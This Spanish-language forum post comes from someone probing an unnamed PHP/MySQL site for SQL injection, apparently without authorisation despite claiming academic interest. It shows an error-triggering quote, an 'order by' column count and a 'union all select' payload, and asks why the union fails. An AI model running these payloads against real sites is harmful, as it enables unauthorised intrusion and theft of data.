estoy tratando de obtener información de una pagina vulnerable(no me gusta hacer maldades solo es un interés académico)
bien reconocí que la pagina es vulnerable por que al ponerle en el url
Código:
xxxxxxx.php?id='
Citar
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' AND active = 'T'' at line 1
con lo cual ya se que es mysql con php y ademas me pasa un pedaso del query y que es vulnerable
luego al tratar de averiguar cuantas columnas vota la consulta puse
xxxxxxx.php?id=4 order by 10/*
me voto error pero con 9 no con lo que averigüe que tiene 9 columnas
acá viene lo extraño cuando trato de sacar mas información usando union
Código:
xxxxxxx.php?id=4 union all select 1,2,3,4,5,6,7,8,9/*
me vota esta respuesta contradictoria
Citar
The used SELECT statements have a different number of columns